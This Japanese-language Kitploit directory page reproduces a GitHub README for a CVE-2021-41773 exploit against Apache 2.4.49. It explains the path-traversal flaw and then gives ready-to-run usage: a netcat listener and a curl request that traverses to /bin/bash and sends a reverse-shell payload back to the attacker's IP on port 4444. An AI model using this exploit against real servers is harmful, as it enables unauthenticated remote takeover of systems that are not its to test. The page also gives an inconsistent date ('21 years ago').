Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE | Kitploit
ツール/GitHubGitHub/cyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubcyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce

CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
21年前未レビュー

CVE-2021-41773 – Apache HTTP Server 2.4.49 リモートコード実行

⚠️ 免責事項
このリポジトリは教育および研究目的のみに使用されることを意図しています。
ここで提供される情報とコードは、プライベートラボのマシンなどの管理された環境でのみ使用できます。
所有していない、またはテストする明示的な許可を得ていないシステムに対するこのコードの不正使用は、違法かつ非倫理的です。
作者は、誤用や発生した損害について一切責任を負いません。


🔍 脆弱性について

CVE-2021-41773 は、Apache HTTP Server バージョン 2.4.49 に影響します。
パス正規化における不適切な入力検証により、攻撃者は %2e のようなエンコードされた文字を使用してパストラバーサルを悪用し、任意のファイルにアクセスできます。
CGI が有効な場合、この脆弱性は認証なしのリモートコード実行 (RCE) にエスカレーションされる可能性があります。

  • 脆弱性タイプ: パストラバーサルによるリモートコード実行
  • 影響を受けるバージョン: Apache 2.4.49
  • 認証要件: ❌ 不要
  • 重要度: 緊急
  • CVSS スコア: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

🧾 参照

  • Apache セキュリティアドバイザリ
  • Exploit-DB – 50383
  • GitHub PoC
  • NVD CVE レポート

🛠 エクスプロイト概要

パストラバーサルの欠陥を悪用するために、悪意のある curl リクエストが作成されます。CGI が有効な場合、攻撃者は /bin/bash に到達して任意のシェルコマンドを実行できます。
この例では、サーバーからシェルアクセスを得るためにリバースシェルペイロードが送信されます。


💥 デモ

このエクスプロイトはプライベートラボ環境でテストされました。以下は、手順と結果です。

1. Apache バージョンの検出

Nmap スキャンにより、ターゲットが Apache/2.4.49 を実行していることが特定されました。

Apache バージョン


2. エクスプロイトの実行

細工された curl コマンドを使用して、リバースシェルペイロードが配信されました。

エクスプロイト実行


3. リバースシェルの取得

攻撃者のリスナー上でリバースシェルが正常に取得されました。

リバースシェル


📂 エクスプロイトの使用方法

ステップ 1: Netcat リスナーを起動

root@kitploit:~
nc -nvlp 4444

ステップ 1: エクスプロイトを実行

root@kitploit:~
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'

✔️ 確認事項:

Apache のバージョンが 2.4.49 であること

CGI が有効であること

ポート 4444(または選択したポート)がファイアウォールで開放されていること

📖 Medium ブログ

詳細なウォークスルーと理論は、私の Medium 投稿をご覧ください:
👉 Medium でブログを読む

ツールをダウンロード